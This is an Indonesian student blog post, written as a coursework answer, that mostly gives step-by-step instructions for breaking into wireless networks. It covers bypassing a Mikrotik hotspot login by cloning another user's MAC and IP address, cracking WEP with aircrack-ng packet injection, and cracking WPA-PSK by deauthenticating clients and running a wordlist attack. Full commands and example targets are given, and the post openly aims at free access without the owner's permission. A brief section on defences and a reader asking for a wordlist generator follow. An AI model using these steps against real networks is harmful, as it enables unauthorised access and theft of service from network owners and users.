Selasa, 25 Januari 2011

Keamanan Wireless

Tugas Mata Kuliah Sistem Keamanan

Dosen : Rahmatul Irfan, M.T.

1. Carilah cara untuk melakukan pembobolan Captive Portal

2. Carilah cara untuk melakukan pembobolan WEP Encryption

3. Carilah cara untuk melakukan pembobolan WPA Encryption

4. Carilah cara untuk melakukan pembobolan WPA-PSK Encryption

5. Menurut anda bagaimana cara mengamankan jaringan wireless?

Jawab :

1. Cara membobol Captive Portal

Captive Portal merupakan suatu teknik autentikasi dan pengamanan data yang lewat dari network internal ke network eksternal. Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik, sehingga user melakukan registrasi. Biasanya Captive Portal digunakan pada infrastruktur wireless seperti hotspot area, tapi tidak menutup kemungkinan untuk diterapkan pada jaringan kabel.

Infrastruktur Captive Portal awalnya didesign untuk keperluan komunitas yang memungkinkan semua orang dapat terhubung (open network). Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :

• user dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP address (DHCP).

• block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis web) yang terletak pada jaringan kabel.

• redirect atau belokkan semua trafik web ke captive portal
• setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)
Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat dispoofing. Serangan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah dijelaskan pada bagian 4 diatas. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni dengan memanfaatkan ARP cache poisoning, kita dapat melakukan redirect trafik dari client yang sudah terhubung sebelumnya. Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mensetup Access Point (biasanya menggunakan HostAP) yang menggunakan komponen informasi yang sama seperti AP target seperti SSID, BSSID hingga kanal frekuensi yang digunakan. Sehingga ketika ada client yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya. Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi. Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti https,pop3s, ssh, imaps dst.

Cara membobol captive porta dicontohkan pada jaringan hotspot atau wifi pada warnet(warung internet), tentunya anda harus membeli voucher yang sudah ada username dan password yang mungkin harganya berkisar 3 sampai 5.000 perjamnya. Biasanya hospot yang ini memakai mikrotik. Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing. Tampilan mikrotik kira kira seperti ini

Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.

Berikut langkah-langkahnya :


1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload
DISINI. (disini pemakaian netcut bukan untuk memutuskan jaringan orang, tapi untuk mencari IP adress dan mac address
2. Koneksikan komputer kita dengan hotspot mikrotik

3. Jalankan program Netcut

4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard

5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.

6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.

7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C

9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.


Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all

10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.

11. Hasil :

Sebelum melakukan clone

Sesudah melakukan clone

\

2. Cara membobol WEP

WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric

Cara membobol WEP menggunakan BackTrack :

1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan menggunakan shell. Ketikkan:

Ifconfig rausb0

Iwconfig rausb0

2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoring dengan menggunakan shell ketikkan:

airodump-ng rausb0

3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:
iwconfig rausb0 mode monitor channel 8

airodump-ng -- channel 8 --ivs -w namafile rausb0

4. shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng

5. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:
Aireplay-ng -1 -30 -e CIPUTIH “a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

6. Lakukan fake authentification sampai muncul balasan jawaban:Authentification successful Keep live sending packet. Lakukan terus sampai mendapatkan key WEP pada langkah aircrack-ng

7. Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:
Aireplay-ng -3 “b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0

8. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan

aircrack-ng “e CIPUTIH -b 00:18:f8:36:83:47 (namafile).

9. Ivs lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya. Tunggu sampai mendapat display. Key Found (B1:92:27:EF:6E) Probability 100%

10. Matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:

iwconfig rausb0 mode managed “ CIPUTIH key B1:92:27:EF:6E
lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:

dhcpcd rausb0

lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com

3. Cara Membobol WPA

Buka Kunci WPA dengan spoonwpa

Pada dasarnya proses cracking kunci wpa dengan spoonwpa sama dengan cracking wep dengan spoonwep cuma bedanya ketika sudah mendapatkan atau sudah menangkap data maka proses penangkapan berhenti yang kemudian kita lanjutkan denga proses pembongkaran.

Pembongkaran dari hasil penangkapan inilah yang sangat membedakan antara sponwep dengan spoonwpa. Untuk spoonwep data yang terkumpul sebagai hasil dari penangkapan signal yang mencapai 20.000 data lebih itu di cocokan pada saat kita masih terhubung denga bssid, namun untuk cracking wpa ketika penangkapan sudah berhasil maka kita bisa memutuskan hubungan dengan bssid untuk selanjutnya kita mencocokan hasil penangkapan dengan daftar nama atau nomor campuran huruf dengan angka ataupun dengan simbol. Ketemu atau tidak ketemu kunci wpa tergantung dengan word list yang kita punya.

Dan gambar di bawah ini adalah contoh cracking dengan spoonwpa.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxVOvYaW4G34sDFM6A8z_ZUafRY41BkEa7979l1aWi-MPrT90Pnw1zX76zh4IbJSqz7I7Y6YSCVTjObDqj0uJ51phG49u9q-wJsjX02ZMwnXUZG20HO0HcfDqqhtGX4fYokv9hMOh5vTBU/s320/snapshot1.png

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDLZUUWgkoiYk07MWBPpbM1FCGbElog_aZ20Pq1aPxFpa5rYjTeq5M4uSJTKRsmhmCVoIfp28-_TaABUMqTuHazwn7VUrEiFjSjzMg_kwY9KLNbGWcTJbDE7YNJA0TA3ijnuWrr2zbayNj/s320/snapshot2.png


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNR7dt0j6tetpKgGAiqyIVFjO72PqGRot22Kt3-4I6JBr3f_B0GSHC5FQZXA7VT19nYNm1oKFpWsMdk4Rfk2nywh5vQbsbaAO0DtV5zG4oF5SZwaqAvoZzzcwmzVURZBGlRYsBj4rOKOZ/s320/snapshot3.png

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBHdL1WFK54LrBlpW_ygt-7JpmDSctFtK9pXoz5_vJGLMBLyuCNvnaoXlNC5-2bM1C6rLIBL6bIy_wx9k-XdSQXyNGCm4W8C9y2qWvMifAtMEm4IWIUfrByWnzVfFytJCuG2MZDRZd9v3/s320/snapshot4.png

Sebagai contoh saya melakukan captured pada salah satu bssid dan hasil penangkapan adalah 123123123. Perlu diketahui bahwa kita tidak tahu bssid tersebut mempunyai password 123123123 airodump-ng hanya menangkap sebuah signal yang kemudian akan divisualisasikan dengan cara mencocokan signal hasil tangkapan dengan daftar kata yang kita miliki yang ternyata adalah 123123123. Kalau wordlist yang kita punya tidak ada 123123123 maka proses cracking tidak akan berhasil karena signal yang ditangkap tidak menemukan bentuk yang sama pada wordlist.

Jadi kesimpulannya untuk crcking wpa, berhasil atau tidaknya kita melakukan cracking tergantung pada wordlist maka dari itu kita perlu kretif membuat kata atau nomor urut sesuai dengan kebutuhan.

4. Cara membobol WPA-PSK

WPA-PSK (Wi-Fi Protected Access – Pre Shared Key)

Adalah pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

Pada access point Dlink DWL-2000AP, pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan access point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES.

Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

1. Tutorial Cara Cracking Password Hotspot WPA-PSK Dengan Linux Ubuntu

Setelah sedikit mengetahui wpa-psk, maka selanjutnya kita akan mencoba untuk cracking wpa-psk tersebut. Cara ini bisa menggunakan linux backtrack 4 final release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.

1. Siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu

sudo apt-get install aircrack-ng

2. Masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)

3. Buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada


sudo su

ifconfig -a

4. Ketikkan perintah di bawah untuk mengaktifkan interface wlan0


ifconfig wlan0 up


5. Sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.


airmon-ng start wlan0


6. monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.


airodump-ng mon0

cat : mon0 adalah interface virtual hasil dari airmon-ng tadi

7. fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.


airodump-ng -w coba –channel 11 –bssid 001122334455 mon0


ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’ Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking

aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0


ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking -0 : mode serangan deAuthentication 1 : dilakukan sebanyak 1x deAuth Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah


aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt


ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt


Keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal

Atau dapat juga dengan cara ini:

Setting wireless card pada monitor mode

airmon-ng stop ath0
airmon-ng start wifi0 7


* 7 = channel of AP

Lihat dan ambil paket menjadi sebuah file menggunakan airodump-ng

airodump-ng -w psk -c 7 --bssid 00:18:F6:AC:11:13 ath0

-w = Capture file (usally saved to root)
-c = channel of AP
--bssid = AP mac address
ath0 = your wireless card mac address


aireplay-ng -0 1 -a 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0

-0 = deauth client
-a = bssid
-h = your mac (source)


Ketika paket sudah didapatkan, crack dengan aircrack-ng

aircrack-ng -w dictionary.txt -b 00:18:F6:AC:11:13 psk.cap

-w = Your dictionary file
-b = bssid (AP mac address)
psk.cap = your capture file

5. Bagaimana mengamankan jaringan wireless

Jaringan wireless merupakan jaringan internet tanpa kabel yang dapat dishare oleh beberapa user, sehingga user dapat menikmati fasilitas internet secara luas dan bebas. Jaringan wireless ini biasanya diamankan dengan password sehingga yang dapat mengakses internet hanya user-user yang mengetahui passwordnya.

Akan tetapi, saat ini makin banyak yang berusaha membobol jaringan wireless tersebut supaya dapat memperoleh akses internet tanpa harus menggunakan password.

Cara untuk menghindari adanya pembobolan jaringan wireless, mungkin dengan cara mendaftarkan semua komputer/laptop client (MAC Address), supaya dapat dideteksi apakah user tersebut merupakan anggota dari suatu jaringan wireless atau bukan.

Atau dengan menggunakan captive portal, dengan captive portal semua user harus log in terlebih dahulu sebelum mengakses jaringan internet wireless. Selain itu setiap user yang terdaftar MAC Addressnya mendapatkan UserID dan password yang berbeda-beda, sehingga user yang tidak atau belum mendaftarkan MAC Addressnya tidak dapat log in dan menikmati akses internet wireless.

Dan yang terakhir adalah mengaktifkan fitur Proxy dan fitur Firewall yang sudah terintegrasi pada Sistem Operasi Server Linux. Serta menggunakan pengamanan berlapis pada seting Linux maupun lainnya seperti mikrotik.

1 komentar:

  1. askum lam kenal nikey oh ya tolong cariin sofware yng bisa bikin wordlist dari 0500000000 sampai 0599999999 sebelumnya makasih low bisa kirim via email ttd>>> rezaa_a@yahoo.com

    BalasHapus